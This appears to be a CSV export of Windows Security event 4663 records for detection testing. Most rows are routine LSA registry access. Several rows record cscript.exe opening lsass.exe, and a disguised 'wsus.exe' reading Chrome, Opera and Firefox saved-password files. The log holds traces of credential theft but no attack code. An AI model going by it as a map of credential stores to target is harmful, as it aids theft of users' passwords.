+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452829 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452828 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452827 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452826 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452825 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452824 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452823 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.205246+04:00,1553038515.205246,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452822 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.185218+04:00,1553038515.185218,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452821 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.185218+04:00,1553038515.185218,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452820 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.045016+04:00,1553038515.045016,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452819 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.045016+04:00,1553038515.045016,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452818 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.904814+04:00,1553038514.904814,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452817 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.904814+04:00,1553038514.904814,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452816 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.764613+04:00,1553038514.764613,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452815 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.764613+04:00,1553038514.764613,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452814 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.634426+04:00,1553038514.634426,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452813 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452922 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452921 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452920 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452919 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452918 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452917 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452916 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452915 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452914 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452913 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452912 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452911 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452910 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452909 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452908 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452907 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452906 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security," + + + + + 4663 + 1 + 0 + 12802 + 0 + 0x8020000000000000 + + + 314462 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x33392 + Security + Process + \Device\HarddiskVolume1\Windows\System32\lsass.exe + 0x558 + %%4484 + + 0x10 + 0x1688 + C:\Windows\System32\cscript.exe + - + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4991 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4990 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4989 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4988 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security," + + + + + 4663 + 1 + 0 + 12802 + 0 + 0x8020000000000000 + + + 314462 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x33392 + Security + Process + \Device\HarddiskVolume1\Windows\System32\lsass.exe + 0x558 + %%4484 + + 0x10 + 0x1688 + C:\Windows\System32\cscript.exe + - + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4991 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4990 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4989 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4988 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452905 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452904 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452903 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 